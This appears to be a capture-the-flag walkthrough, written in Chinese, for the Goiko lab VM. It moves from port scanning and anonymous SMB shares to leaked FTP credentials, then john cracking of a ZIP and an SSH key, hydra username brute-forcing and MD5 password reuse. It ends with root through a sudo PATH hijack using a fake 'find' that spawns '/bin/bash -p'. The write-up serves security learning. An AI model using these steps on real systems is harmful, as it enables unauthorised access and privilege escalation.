Goiko

image

信息搜集

192.168.43.147

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
┌──(root㉿Eecho)-[~]
└─# rustscan -a 192.168.43.147 -- -A
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
😵 https://admin.tryhackme.com

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 10140'.
Open 192.168.43.147:22
Open 192.168.43.147:139
Open 192.168.43.147:445
Open 192.168.43.147:10021
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -A" on ip 192.168.43.147
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.99 ( https://nmap.org ) at 2026-05-19 14:08 +0800
NSE: Loaded 158 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 14:08
Completed NSE at 14:08, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 14:08
Completed NSE at 14:08, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 14:08
Completed NSE at 14:08, 0.00s elapsed
Initiating ARP Ping Scan at 14:08
Scanning 192.168.43.147 [1 port]
Completed ARP Ping Scan at 14:08, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 14:08
Completed Parallel DNS resolution of 1 host. at 14:08, 0.50s elapsed
DNS resolution of 1 IPs took 0.50s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 14:08
Scanning 192.168.43.147 [4 ports]
Discovered open port 445/tcp on 192.168.43.147
Discovered open port 22/tcp on 192.168.43.147
Discovered open port 10021/tcp on 192.168.43.147
Discovered open port 139/tcp on 192.168.43.147
Completed SYN Stealth Scan at 14:08, 0.02s elapsed (4 total ports)
Initiating Service scan at 14:08
Scanning 4 services on 192.168.43.147
Completed Service scan at 14:09, 41.05s elapsed (4 services on 1 host)
Initiating OS detection (try #1) against 192.168.43.147
NSE: Script scanning 192.168.43.147.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 14:09
Completed NSE at 14:09, 3.35s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 14:09
Completed NSE at 14:09, 0.03s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 14:09
Completed NSE at 14:09, 0.00s elapsed
Nmap scan report for 192.168.43.147
Host is up, received arp-response (0.00067s latency).
Scanned at 2026-05-19 14:08:50 CST for 45s

PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey:
| 256 e6:e0:15:63:c4:74:9e:04:7c:95:44:d5:45:c2:b4:4a (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFXCIDsKXRDCiufvMhw2Ev7OFoULW8RdIwDqUqSoppFG8twYgmEGYbrVegZIl29Nn+fEctMV2LKDtWWe4GIE5+I=
| 256 44:02:f3:25:5d:f0:b2:f3:2b:71:a3:08:dd:4f:37:72 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICEpO8Gb6cQYi4e0TOd7w9AuKPgoXom8ibTOIBlikdEe
139/tcp open netbios-ssn syn-ack ttl 64 Samba smbd 4
445/tcp open netbios-ssn syn-ack ttl 64 Samba smbd 4
10021/tcp open ftp syn-ack ttl 64 vsftpd 2.0.8 or later
MAC Address: 08:00:27:2D:BD:DA (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4)
TCP/IP fingerprint:
OS:SCAN(V=7.99%E=4%D=5/19%OT=22%CT=%CU=34225%PV=Y%DS=1%DC=D%G=N%M=080027%TM
OS:=6A0BFE9F%P=x86_64-pc-linux-gnu)SEQ(SP=FF%GCD=1%ISR=10B%TI=Z%CI=Z%II=I%T
OS:S=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=
OS:M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=F
OS:E88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A
OS:=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%
OS:Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=
OS:A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=
OS:Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%
OS:T=40%CD=S)

Uptime guess: 39.053 days (since Fri Apr 10 12:53:09 2026)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=255 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb2-time:
| date: 2026-05-19T06:09:35
|_ start_date: N/A
| nbstat: NetBIOS name: VENTURA, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| VENTURA<00> Flags: <unique><active>
| VENTURA<03> Flags: <unique><active>
| VENTURA<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| WORKGROUP<00> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
| WORKGROUP<1e> Flags: <group><active>
| Statistics:
| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_ 00 00 00 00 00 00 00 00 00 00 00 00 00 00
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 7329/tcp): CLEAN (Couldn't connect)
| Check 2 (port 46098/tcp): CLEAN (Couldn't connect)
| Check 3 (port 65237/udp): CLEAN (Failed to receive data)
| Check 4 (port 32943/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: 2s
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required

TRACEROUTE
HOP RTT ADDRESS
1 0.67 ms 192.168.43.147

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 14:09
Completed NSE at 14:09, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 14:09
Completed NSE at 14:09, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 14:09
Completed NSE at 14:09, 0.00s elapsed
Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 46.53 seconds
Raw packets sent: 27 (1.982KB) | Rcvd: 19 (1.454KB)
  • 22 SSH
  • 139 SMB
  • 445 SMB
  • 10021 FTP

smb枚举

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(root㉿Eecho)-[/tmp/bbbb]
└─# smbclient -L //192.168.43.147 -N

Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
food Disk Food
dessert Disk Dessert
menu Disk Menu
IPC$ IPC IPC Service (Samba 4.17.12-Debian)
nobody Disk Home Directories
Reconnecting with SMB1 for workgroup listing.
smbXcli_negprot_smb1_done: No compatible protocol selected by server.
Protocol negotiation to server 192.168.43.147 (for a protocol between LANMAN1 and NT1) failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available

一共有4个共享目录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
┌──(root㉿Eecho)-[/tmp/bbbb]
└─# smbclient //192.168.43.147/food -N
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed May 15 16:56:53 2024
.. D 0 Sat Jun 8 15:14:41 2024
creds.txt N 166 Wed May 15 16:56:49 2024

163042124 blocks of size 1024. 148873012 blocks available
smb: \> get creds.txt
getting file \creds.txt of size 166 as creds.txt (7.4 KiloBytes/sec) (average 7.4 KiloBytes/sec)
smb: \>
┌──(root㉿Eecho)-[/tmp/bbbb]
└─# cat creds.txt
- ENGLISH = If you think it's that easy, we're in trouble.

- CASTELLANO = Si crees que es tan facil vamos mal.

- CATALA = Si creus que es tan facil anem malament.



┌──(root㉿Eecho)-[/tmp/bbbb]
└─# smbclient //192.168.43.147/dessert -N
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed May 15 17:05:26 2024
.. D 0 Sat Jun 8 15:14:41 2024
comida.txt N 358 Wed May 15 17:05:26 2024
cafe.txt N 251 Wed May 15 17:01:05 2024
creds.txt N 31 Wed May 15 17:02:15 2024

163042124 blocks of size 1024. 148873012 blocks available
smb: \> get comida.txt
getting file \comida.txt of size 358 as comida.txt (69.9 KiloBytes/sec) (average 69.9 KiloBytes/sec)
smb: \> get cafe.txt
getting file \cafe.txt of size 251 as cafe.txt (81.7 KiloBytes/sec) (average 74.3 KiloBytes/sec)
smb: \> get creds.txt
getting file \creds.txt of size 31 as creds.txt (10.1 KiloBytes/sec) (average 56.8 KiloBytes/sec)
smb: \>
┌──(root㉿Eecho)-[/tmp/bbbb]
└─# cat comida.txt
- ENGLISH = I like the tall, strong guy at the table, I'm going to take him the cheeseburger so I can talk to him.

- CASTELLANO = Me gusta el chico alto y fuerte de la mesa, le voy a llevar la hamburguesa con queso para poder hablar con el.

- CATALA = M'agrada el noi alt i fort de la taula, li portare l'hamburguesa amb formatge per poder parlar amb ell.
┌──(root㉿Eecho)-[/tmp/bbbb]
└─# cat cafe.txt
- ENGLISH = I'm going to take the coffee without milk to the idiot turkey outside.

- CASTELLANO = Al idiota del pavo este de fuera le voy a llevar el cafe sin leche.

- CATALA = A l'idiota del gall dindi aquest de fora li portare el cafe sense llet.
┌──(root㉿Eecho)-[/tmp/bbbb]
└─# cat creds.txt
user = m.....

Look better :)

┌──(root㉿Eecho)-[/tmp/bbbb]
└─# smbclient //192.168.43.147/menu -N
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed May 15 16:59:21 2024
.. D 0 Sat Jun 8 15:14:41 2024
.cafesinleche H 40 Fri Apr 26 04:18:58 2024
goiko.txt N 193 Wed May 15 16:55:21 2024

163042124 blocks of size 1024. 148873012 blocks available
smb: \> get goiko.txt
getting file \goiko.txt of size 193 as goiko.txt (62.8 KiloBytes/sec) (average 62.8 KiloBytes/sec)
smb: \> get .cafesinleche
getting file \.cafesinleche of size 40 as .cafesinleche (9.8 KiloBytes/sec) (average 32.5 KiloBytes/sec)
smb: \>
┌──(root㉿Eecho)-[/tmp/bbbb]
└─# cat .cafesinleche user = marmai
pass = EspabilaSantiaga69
┌──(root㉿Eecho)-[/tmp/bbbb]
└─# cat goiko.txt
- ENGLISH = If you can't order a fucking coffee, it's not my fault.

- CASTELLANO = Si no sabes pedir un puto cafe no es mi culpa.

- CATALA = Si no saps demanar un puto cafe no es culpa meva.


smbclient //192.168.43.147/nobody -N


在menu共享目录里面.cafesinleche文件泄露了一个凭证,尝试ssh无果后怀疑是ftp的凭证 ‍

ftp枚举

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
┌──(root㉿Eecho)-[/tmp/bbbb]
└─# ftp 192.168.43.147 10021
Connected to 192.168.43.147.
220 El gurpreet estuvo por aqui...
Name (192.168.43.147:root): marmai
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||27309|)
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 2406 Apr 25 2024 BurgerWithoutCheese.zip
226 Directory send OK.
ftp> get BurgerWithoutCheese.zip
local: BurgerWithoutCheese.zip remote: BurgerWithoutCheese.zip
229 Entering Extended Passive Mode (|||29135|)
150 Opening BINARY mode data connection for BurgerWithoutCheese.zip (2406 bytes).
100% |***************************************************************************| 2406 22.06 MiB/s 00:00 ETA
226 Transfer complete.
2406 bytes received in 00:00 (3.33 MiB/s)
ftp>

有个BurgerWithoutCheese.zip,但是存在密码尝试爆破

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
┌──(root㉿Eecho)-[/tmp/bbbb]
└─# zip2john BurgerWithoutCheese.zip > zip_hash.txt
ver 2.0 efh 5455 efh 7875 BurgerWithoutCheese.zip/id_rsa PKZIP Encr: TS_chk, cmplen=2027, decmplen=2655, crc=5A090028 ts=90B9 cs=90b9 type=8
ver 1.0 efh 5455 efh 7875 ** 2b ** BurgerWithoutCheese.zip/users PKZIP Encr: TS_chk, cmplen=47, decmplen=35, crc=8254F58A ts=90C5 cs=90c5 type=0
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.
┌──(root㉿Eecho)-[/tmp/bbbb]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt zip_hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 24 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
princess95 (BurgerWithoutCheese.zip)
1g 0:00:00:00 DONE (2026-05-19 14:29) 50.00g/s 2457Kp/s 2457Kc/s 2457KC/s 123456..trudy
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

成功获取到密码,解压出来有一个私钥和用户名字典

1
2
3
4
5
6
┌──(root㉿Eecho)-[/tmp/bbbb]
└─# unzip BurgerWithoutCheese.zip
Archive: BurgerWithoutCheese.zip
[BurgerWithoutCheese.zip] id_rsa password:
inflating: id_rsa
extracting: users

这里肯定是需要爆破用户名了,但是给的是私钥所以还需要爆破私钥密码

1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(root㉿Eecho)-[/tmp/bbbb]
└─# ssh2john id_rsa > rsa_hash.txt ┌──(root㉿Eecho)-[/tmp/bbbb]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt rsa_hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 24 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
babygirl (id_rsa)
1g 0:00:00:00 DONE (2026-05-19 14:32) 1.250g/s 240.0p/s 240.0c/s 240.0C/s 123456..november
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

成功爆破出密码,现在需要使用hydra爆破用户名

1
2
3
4
5
6
7
8
┌──(root㉿Eecho)-[/tmp/bbbb]
└─# hydra -L users -p babygirl ssh://192.168.43.147 Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-05-19 14:32:50
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 5 tasks per 1 server, overall 5 tasks, 5 login tries (l:5/p:1), ~1 try per task
[DATA] attacking ssh://192.168.43.147:22/
[22][ssh] host: 192.168.43.147 login: gurpreet password: babygirl

登录gurpreet用户

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(root㉿Eecho)-[/tmp/bbbb]
└─# ssh gurpreet@192.168.43.147
gurpreet@192.168.43.147's password:
Linux ventura 6.1.0-20-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.85-1 (2024-04-11) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed May 15 05:41:59 2024 from 192.168.1.35
gurpreet@ventura:~$ id
uid=1002(gurpreet) gid=1003(groupssh) groups=1003(groupssh),100(users)
gurpreet@ventura:~$

提权

babygirl -> nika

babygirl家目录下nota文件给出了提示

  • ENGLISH = The database has very simple hashes, please configure it well.

  • CASTELLANO = La base de datos tiene hashes muy sencillos, por favor configuralo bien.

  • CATALA = La base de dades te hashes molt senzills, si us plau configura be.

  • 英文 = 数据库中的哈希值非常简单,请妥善进行配置。

  • 西班牙语 = 数据库中的哈希值非常简单,请务必正确设置。

  • 塞塔拉 = 数据库的加密方式很简单,如果愿意的话,可以进行适当的配置。

同时家目录下的.mysql_history并没有删除

1
2
3
4
5
6
7
8
9
10
11
12
13
gurpreet@ventura:~$ cat .mysql_history | awk '{gsub(/\\040/, " "); print}'
_HiStOrY_V2_
show databases;
use ceti
show tables;
select * from alumnos;
select * from profesores;
use secta
show tables;
select * from integrantes;
show databases;
use ceti;
show tables;

登录mysql

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
gurpreet@ventura:~$ mysql -u gurpreet -pbabygirl
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 34
Server version: 10.11.6-MariaDB-0+deb12u1 Debian 12

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> use ceti;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [ceti]> select * from alumnos;
Empty set (0.000 sec)

MariaDB [ceti]> select * from profesores;
Empty set (0.000 sec)

MariaDB [ceti]> use secta
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [secta]> select * from integrantes;
+----+---------+----------------------------------+
| id | name | password |
+----+---------+----------------------------------+
| 1 | carline | 703ff9a12582b2aaaa3fe7f89bb976c8 |
| 2 | nika | c6f606a6b6a30cbaa428131d4c074787 |
+----+---------+----------------------------------+
2 rows in set (0.000 sec)

MariaDB [secta]>

有两个用户,但是密码是md5加密的使用在线网站破解

只有carline用户成功爆破出来了

image

但是并没有carline用户只有nika用户,这里尝试密码复用发现carline的密码也是nika的密码

横向移动到nika

1
2
3
4
5
gurpreet@ventura:~$ su nika
Password:
nika@ventura:/home/gurpreet$ id
uid=1000(nika) gid=1000(nika) groups=1000(nika),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),100(users),106(netdev),111(bluetooth),113(lpadmin),116(scanner)
nika@ventura:/home/gurpreet$

nika -> root

1
2
3
4
5
6
nika@ventura:/home/gurpreet$ sudo -l
Matching Defaults entries for nika on ventura:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User nika may run the following commands on ventura:
(ALL) SETENV: NOPASSWD: /opt/porno/watchporn.sh

可以使用/opt/porno/watchporn.sh进行提权

1
2
3
4
5
6
7
nika@ventura:/home/gurpreet$ cat /opt/porno/watchporn.sh
#!/bin/bash
learningbash="Hello World"
echo $learningbash

find source_images -type f -name '*.jpg' -exec chown root:root {} \:
nika@ventura:/home/gurpreet$

当执行 sudo -l时,你看到了这行关键信息:

(ALL) SETENV: NOPASSWD: /opt/porno/watchporn.sh

  1. NOPASSWD:意味着可以在不需要输入密码的情况下,以 root 权限运行该脚本。
  2. SETENV:它允许你在使用 sudo 执行命令时,保留或自定义环境变量。
  3. 脚本中的相对路径:查看 /opt/porno/watchporn.sh 的内容,它在调用 find 工具时,使用的是相对路径,而不是绝对路径

因为 find 是相对路径,系统在执行时会根据 PATH 变量中定义的目录顺序(从左到右)去寻找 find 程序。由于你可以通过 SETENV 控制 PATH 变量,因此可以欺骗系统去执行一个由自己创建的“恶意” find 程序。

1
2
3
4
5
6
7
8
nika@ventura:/home/gurpreet$ cd /tmp
nika@ventura:/tmp$ echo '/bin/bash -p' > find
nika@ventura:/tmp$ chmod +x find
nika@ventura:/tmp$ sudo PATH="/tmp:$PATH" /opt/porno/watchporn.sh
Hello World
root@ventura:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
root@ventura:/tmp#